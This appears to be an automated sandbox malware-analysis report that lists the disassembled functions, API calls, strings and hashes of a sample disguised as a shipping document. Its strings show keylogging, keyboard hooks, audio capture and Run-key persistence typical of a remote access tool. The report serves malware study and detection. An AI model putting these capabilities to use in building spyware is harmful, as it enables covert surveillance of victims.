                                                      • Instruction Fuzzy Hash: FC01D83261D7236BD7214B79AC44A577798BB05BA1B1106B2F906E3241D768D802C6D8
                                                      Function 0041B61A Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B633
                                                      • GetFileSize.KERNEL32(00000000,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B647
                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B66C
                                                      • CloseHandle.KERNEL32(00000000,?,00000000,00403AF3,00465324), ref: 0041B67A
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$CloseCreateHandleReadSize
                                                      • String ID:
                                                      • API String ID: 3919263394-0
                                                      • Opcode ID: 5b639659936e0bf80293aa969ecd5facc1abbd81689efef7b5bf737102e1771e
                                                      • Instruction ID: 0a6fce4b3becde4f67ebc64a516323d43c368a538d14007d95c0a1c89629aad3
                                                      • Opcode Fuzzy Hash: 5b639659936e0bf80293aa969ecd5facc1abbd81689efef7b5bf737102e1771e
                                                      • Instruction Fuzzy Hash: B3F0F6B12053047FE6101B25FC85FBF375CDB867A5F00023EFC01A22D1DA658C459179
                                                      Function 0041850C Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetSystemMetrics.USER32(0000004C), ref: 00418519
                                                      • GetSystemMetrics.USER32(0000004D), ref: 0041851F
                                                      • GetSystemMetrics.USER32(0000004E), ref: 00418525
                                                      • GetSystemMetrics.USER32(0000004F), ref: 0041852B
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MetricsSystem
                                                      • String ID:
                                                      • API String ID: 4116985748-0
                                                      • Opcode ID: 5cbd94679aa6c8e7ceff70e29103114ee131790299e318eb9a9968d7a4031cfb
                                                      • Instruction ID: 928f1b056b10b768f566869b0c9e39fed015f0adb742d9b99f9daccd71f82e50
                                                      • Opcode Fuzzy Hash: 5cbd94679aa6c8e7ceff70e29103114ee131790299e318eb9a9968d7a4031cfb
                                                      • Instruction Fuzzy Hash: 96F0D672B043216BCA00EA798C4556FBB97DFD02A4F25083FE6059B341DEB8EC4687D9
                                                      Function 0041B37D Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                      • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                      • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3D3
                                                      • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3DB
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseHandleOpenProcess
                                                      • String ID:
                                                      • API String ID: 39102293-0
                                                      • Opcode ID: 51a17e5294b38f17d5f3a71b1001121c929f89ba237b4680bf25dfaaaa51ef0d
                                                      • Instruction ID: bb9aee54fd4b55ef2446b45ef4d52834339351c189d8e7c886657dc3bd6b5f1d
                                                      • Opcode Fuzzy Hash: 51a17e5294b38f17d5f3a71b1001121c929f89ba237b4680bf25dfaaaa51ef0d
                                                      • Instruction Fuzzy Hash: 2FF04971204209ABD3106754AC4AFA7B27CDB40B96F000037FA61D22A1FFB4CCC146AE
                                                      Function 00441EDD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __startOneArgErrorHandling.LIBCMT ref: 00441F6D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorHandling__start
                                                      • String ID: pow
                                                      • API String ID: 3213639722-2276729525
                                                      • Opcode ID: c11d7b0c0eb8e10153fe90c38a808d625a788e1790705f3c08302100bb714254
                                                      • Instruction ID: c296867054112a427edbdd16b3baf579c6faf9d8481746a729c2ad46b2c40409
                                                      • Opcode Fuzzy Hash: c11d7b0c0eb8e10153fe90c38a808d625a788e1790705f3c08302100bb714254
                                                      • Instruction Fuzzy Hash: 2A517B61A1620196F7117714C98137F2BD0DB50741F688D6BF085423F9DF3D8CDA9A4E
                                                      Function 00414B9B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 163COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CountEventTick
                                                      • String ID: >G
                                                      • API String ID: 180926312-1296849874
                                                      • Opcode ID: 8970c785a5fde0425d3bdd382a7839f198ae3ee3428ffa10454bc42c3a0da609
                                                      • Instruction ID: d5b3ec7783a4dd7183bbf31121b5a8e130ff38f85bff4fd723ced1f164cd3d8d
                                                      • Opcode Fuzzy Hash: 8970c785a5fde0425d3bdd382a7839f198ae3ee3428ffa10454bc42c3a0da609
                                                      • Instruction Fuzzy Hash: 1A5170315042409AC624FB71D8A2AEF73A5AFD1314F40853FF94A671E2EF389949C69A
                                                      Function 0044DB34 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 132COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0044DB59
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Info
                                                      • String ID: $fD
                                                      • API String ID: 1807457897-3092946448
                                                      • Opcode ID: 5a1be195421d57dadb90a7404d285975d7b8ac1b4122976fa75ce4288470c48d
                                                      • Instruction ID: 070357306f4c5095a08430c9ceac02bf5c2973ae7142a422f036c1757655e3b4
                                                      • Opcode Fuzzy Hash: 5a1be195421d57dadb90a7404d285975d7b8ac1b4122976fa75ce4288470c48d
                                                      • Instruction Fuzzy Hash: C241FA7090439C9AEB218F24CCC4BF6BBB9DF45308F1404EEE59A87242D279AE45DF65
                                                      Function 004508DE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00450B39,?,00000050,?,?,?,?,?), ref: 004509B9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ACP$OCP
                                                      • API String ID: 0-711371036
                                                      • Opcode ID: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                      • Instruction ID: 7e3e8aaac6bfe0b7539266298c93f9b0706a3ab6a9e9f394231f134d2b8bf5b7
                                                      • Opcode Fuzzy Hash: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                      • Instruction Fuzzy Hash: 072138EAA04201A6F7348B558801B9B7396AF54B23F164826EC49D730BF739DD49C358
                                                      Function 004049BA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68timeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 004049F1
                                                        • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                      • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 00404A4E
                                                      Strings
                                                      • KeepAlive | Enabled | Timeout: , xrefs: 004049E5
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LocalTime
                                                      • String ID: KeepAlive | Enabled | Timeout:
                                                      • API String ID: 481472006-1507639952
                                                      • Opcode ID: 4fbf8cc4982cbc942d3db3f2afc9c4eacdcd9657b35503fb3d66e7a76927aef2
                                                      • Instruction ID: fa495feba5854bec2644a8330ceabc5ae1d4c14ac10d4033695aa89a80f4fa5c
                                                      • Opcode Fuzzy Hash: 4fbf8cc4982cbc942d3db3f2afc9c4eacdcd9657b35503fb3d66e7a76927aef2
                                                      • Instruction Fuzzy Hash: 5A2126A1A042806BC310FB6AD80A76B7B9497D1319F44407EF849532E2DB3C5999CB9F
                                                      Function 0041A686 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59timeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LocalTime
                                                      • String ID: | $%02i:%02i:%02i:%03i
                                                      • API String ID: 481472006-2430845779
                                                      • Opcode ID: 49072da793dd1067c8c4d4b952bdc095bcf71ad5a1237c39b773f575b27685be
                                                      • Instruction ID: d205b4ebe2adc0156a37935a73d605e8b5d9817e81284f53efab16a15aec7ece
                                                      • Opcode Fuzzy Hash: 49072da793dd1067c8c4d4b952bdc095bcf71ad5a1237c39b773f575b27685be
                                                      • Instruction Fuzzy Hash: 80114C725082045AC704EBA5D8568AF73E8AB94708F10053FFC85931E1EF38DA84C69E
                                                      Function 00419E89 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • PathFileExistsW.SHLWAPI(00000000), ref: 00419EAE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExistsFilePath
                                                      • String ID: alarm.wav$xIG
                                                      • API String ID: 1174141254-4080756945
                                                      • Opcode ID: a83789ed06d4bd6bc78d9f5caa1c4ae1948ed669f67617dd6d77616b3b752c21
                                                      • Instruction ID: 7a4fe07350b1461b8d7cab7706a536354aa1130be6e3c83a2e6414618e768e61
                                                      • Opcode Fuzzy Hash: a83789ed06d4bd6bc78d9f5caa1c4ae1948ed669f67617dd6d77616b3b752c21
                                                      • Instruction Fuzzy Hash: 8B01802060420166C604B676D866AEE77458BC1719F40413FF89A966E2EF6CAEC6C2DF
                                                      Function 0040A767 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 0040A884
                                                        • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                        • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                      • CloseHandle.KERNEL32(?), ref: 0040A7CA
                                                      • UnhookWindowsHookEx.USER32 ref: 0040A7DD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                      • String ID: Online Keylogger Stopped
                                                      • API String ID: 1623830855-1496645233
                                                      • Opcode ID: a471bc76fffd1fbac32a3585e4c4fab67e2de2ee53134a9f9046e82175b62acd
                                                      • Instruction ID: 3c154674506c802d119dc10506b29c5389a087cae46ba36945c53301bfe6088f
                                                      • Opcode Fuzzy Hash: a471bc76fffd1fbac32a3585e4c4fab67e2de2ee53134a9f9046e82175b62acd
                                                      • Instruction Fuzzy Hash: CC01D431A043019BDB25BB35C80B7AEBBB59B45315F80407FE481225D2EB7999A6C3DB
                                                      Function 004016E8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • waveInPrepareHeader.WINMM(?,00000020,?,?,00000000,00475B70,00473EE8,?,00000000,00401913), ref: 00401747
                                                      • waveInAddBuffer.WINMM(?,00000020,?,00000000,00401913), ref: 0040175D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: wave$BufferHeaderPrepare
                                                      • String ID: T=G
                                                      • API String ID: 2315374483-379896819
                                                      • Opcode ID: 0ff4070462d876ba9a0314f854ca9e5b2f4718fb39603aa566027c6b2d74496f
                                                      • Instruction ID: f8644d152c35c587af506687758c025c54344a6e575747702fe1289d7b8da532
                                                      • Opcode Fuzzy Hash: 0ff4070462d876ba9a0314f854ca9e5b2f4718fb39603aa566027c6b2d74496f
                                                      • Instruction Fuzzy Hash: 65018B71301300AFD7209F39EC45A69BBA9EB4931AF01413EB808D32B1EB34A8509B98
                                                      Function 00447790 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • IsValidLocale.KERNEL32(00000000,j=D,00000000,00000001,?,?,00443D6A,?,?,?,?,00000004), ref: 004477DC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LocaleValid
                                                      • String ID: IsValidLocaleName$j=D
                                                      • API String ID: 1901932003-3128777819
                                                      • Opcode ID: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
                                                      • Instruction ID: d075984350fdfa8650c9f53b231b8a0b142c4dacf6ed37e79753978632a381d4
                                                      • Opcode Fuzzy Hash: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
                                                      • Instruction Fuzzy Hash: B7F0E930A45218F7EA116B61DC06F5EBB54CF49B11F50407AFD056A293CB796D0195DC
                                                      Function 00401D91 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: H_prolog
                                                      • String ID: T=G$T=G
                                                      • API String ID: 3519838083-3732185208
                                                      • Opcode ID: ece060f59eec47038b163f6730b9b4774a9df75ced3df6c836fae2af045d366e
                                                      • Instruction ID: 37a3980bbf64332544f5ef03d086655580814226aad47650f393c0c18fea351b
                                                      • Opcode Fuzzy Hash: ece060f59eec47038b163f6730b9b4774a9df75ced3df6c836fae2af045d366e
                                                      • Instruction Fuzzy Hash: BCF0E971A00220ABC714BB65C80669EB774EF41369F10827FB416B72E1CBBD5D04D65D
                                                      Function 0040AD56 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetKeyState.USER32(00000011), ref: 0040AD5B
                                                        • Part of subcall function 00409B10: GetForegroundWindow.USER32 ref: 00409B3F
                                                        • Part of subcall function 00409B10: GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                        • Part of subcall function 00409B10: GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                                        • Part of subcall function 00409B10: GetKeyState.USER32(00000010), ref: 00409B5C
                                                        • Part of subcall function 00409B10: GetKeyboardState.USER32(?), ref: 00409B67
                                                        • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409B8A
                                                        • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                                        • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                      • String ID: [AltL]$[AltR]
                                                      • API String ID: 2738857842-2658077756
                                                      • Opcode ID: 2d4b77a5ab42310f07ca9c8b3da7c02f816ae55a84891d8b572aa7cd1e2c76fb
                                                      • Instruction ID: d2c0c429c9fe13b3c6c970781ecfc4970ab7400740a1dec538c1fc9fef0a0b20
                                                      • Opcode Fuzzy Hash: 2d4b77a5ab42310f07ca9c8b3da7c02f816ae55a84891d8b572aa7cd1e2c76fb
                                                      • Instruction Fuzzy Hash: 47E0652134072117C898323EA91E6EE3A228F82B65B80416FF8866BAD6DD6D4D5053CB
                                                      Function 00448803 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _free.LIBCMT ref: 00448825
                                                        • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                        • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorFreeHeapLast_free
                                                      • String ID: `@$`@
                                                      • API String ID: 1353095263-20545824
                                                      • Opcode ID: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                      • Instruction ID: 46705ffcfacdd7a720b29fb61e5cb4af2d59a6418439a2947ca99394172970e0
                                                      • Opcode Fuzzy Hash: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                      • Instruction Fuzzy Hash: B9E06D761006059F8720DE6DD400A86B7E4EF95360320852AE89DE3310DB32E812CB40
                                                      Function 0040ADB0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetKeyState.USER32(00000012), ref: 0040ADB5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: State
                                                      • String ID: [CtrlL]$[CtrlR]
                                                      • API String ID: 1649606143-2446555240
                                                      • Opcode ID: b832f2ba8c23f1ed675ed1d8fb8a36e3adfa50d2a3dfff7a7859d4c0b25c7229
                                                      • Instruction ID: 615b7dbe40c0b8188db9493e0f2b19f017fb36a74fa458c508a435569d7d4a1e
                                                      • Opcode Fuzzy Hash: b832f2ba8c23f1ed675ed1d8fb8a36e3adfa50d2a3dfff7a7859d4c0b25c7229
                                                      • Instruction Fuzzy Hash: 71E0862170071117C514353DD61A67F39228F41776F80013FF882ABAC6E96D8D6023CB
                                                      Function 0041297A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040C33C,00000000,?,00000000), ref: 00412988
                                                      • RegDeleteValueW.ADVAPI32(?,?,?,00000000), ref: 00412998
                                                      Strings
                                                      • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00412986
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: DeleteOpenValue
                                                      • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                      • API String ID: 2654517830-1051519024
                                                      • Opcode ID: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                      • Instruction ID: 4813e9247c8a4fa7715124fbb4df20ddc3d96ddce1d5e270e7c0f337b45b5704
                                                      • Opcode Fuzzy Hash: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                      • Instruction Fuzzy Hash: 0AE01270310304BFEF104F61ED06FDB37ACBB80B89F004165F505E5191E2B5DD54A658
                                                      Function 0043FA5E Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401AD8), ref: 0043FAF4
                                                      • GetLastError.KERNEL32 ref: 0043FB02
                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043FB5D
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ByteCharMultiWide$ErrorLast
                                                      • String ID:
                                                      • API String ID: 1717984340-0
                                                      • Opcode ID: 3f0ff04a5dcf7e8fd5b137fcdb20dceab511bd439b95d46b3d550210e9ecb368
                                                      • Instruction ID: ecac45699e256c48587d6f27f66036641a8fb520bb473c9b2adecd150689d728
                                                      • Opcode Fuzzy Hash: 3f0ff04a5dcf7e8fd5b137fcdb20dceab511bd439b95d46b3d550210e9ecb368
                                                      • Instruction Fuzzy Hash: 65414871E00206AFCF258F65C854ABBFBA4EF09310F1451BAF858973A1DB38AD09C759

                                                      Execution Graph

                                                      Execution Coverage:8.4%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:38
                                                      Total number of Limit Nodes:7
                                                      execution_graph 14666 94d710 DuplicateHandle 14667 94d7a6 14666->14667 14668 94ad30 14669 94ad3f 14668->14669 14672 94ae18 14668->14672 14677 94ae28 14668->14677 14673 94ae5c 14672->14673 14675 94ae39 14672->14675 14673->14669 14674 94b060 GetModuleHandleW 14676 94b08d 14674->14676 14675->14673 14675->14674 14676->14669 14678 94ae5c 14677->14678 14680 94ae39 14677->14680 14678->14669 14679 94b060 GetModuleHandleW 14681 94b08d 14679->14681 14680->14678 14680->14679 14681->14669 14682 94d0c0 14683 94d106 GetCurrentProcess 14682->14683 14685 94d151 14683->14685 14686 94d158 GetCurrentThread 14683->14686 14685->14686 14687 94d195 GetCurrentProcess 14686->14687 14688 94d18e 14686->14688 14689 94d1cb 14687->14689 14688->14687 14690 94d1f3 GetCurrentThreadId 14689->14690 14691 94d224 14690->14691 14692 944668 14693 94467a 14692->14693 14694 944686 14693->14694 14696 944779 14693->14696 14697 94479d 14696->14697 14701 944888 14697->14701 14705 944878 14697->14705 14703 9448af 14701->14703 14702 94498c 14703->14702 14709 9444b0 14703->14709 14706 9448af 14705->14706 14707 94498c 14706->14707 14708 9444b0 CreateActCtxA 14706->14708 14708->14707 14710 945918 CreateActCtxA 14709->14710 14712 9459db 14710->14712

                                                      Executed Functions

                                                      Function 0094D0B1 Relevance: 6.1, APIs: 4, Instructions: 132threadCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 295 94d0b1-94d14f GetCurrentProcess 299 94d151-94d157 295->299 300 94d158-94d18c GetCurrentThread 295->300 299->300 301 94d195-94d1c9 GetCurrentProcess 300->301 302 94d18e-94d194 300->302 303 94d1d2-94d1ed call 94d699 301->303 304 94d1cb-94d1d1 301->304 302->301 308 94d1f3-94d222 GetCurrentThreadId 303->308 304->303 309 94d224-94d22a 308->309 310 94d22b-94d28d 308->310 309->310
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32 ref: 0094D13E
                                                      • GetCurrentThread.KERNEL32 ref: 0094D17B
                                                      • GetCurrentProcess.KERNEL32 ref: 0094D1B8
                                                      • GetCurrentThreadId.KERNEL32 ref: 0094D211
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2064095388.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_940000_Adobe.jbxd
                                                      Similarity
                                                      • API ID: Current$ProcessThread
                                                      • String ID:
                                                      • API String ID: 2063062207-0
                                                      • Opcode ID: 0fee773c68225fcddbbacd3e5c70f90d68d5b61ceb1d1e4a168271391931df11
                                                      • Instruction ID: b228266d04b42d23cb52d129949ca8a1fbc7df4669606bbae1f03cb0aa0a7f62
                                                      • Opcode Fuzzy Hash: 0fee773c68225fcddbbacd3e5c70f90d68d5b61ceb1d1e4a168271391931df11
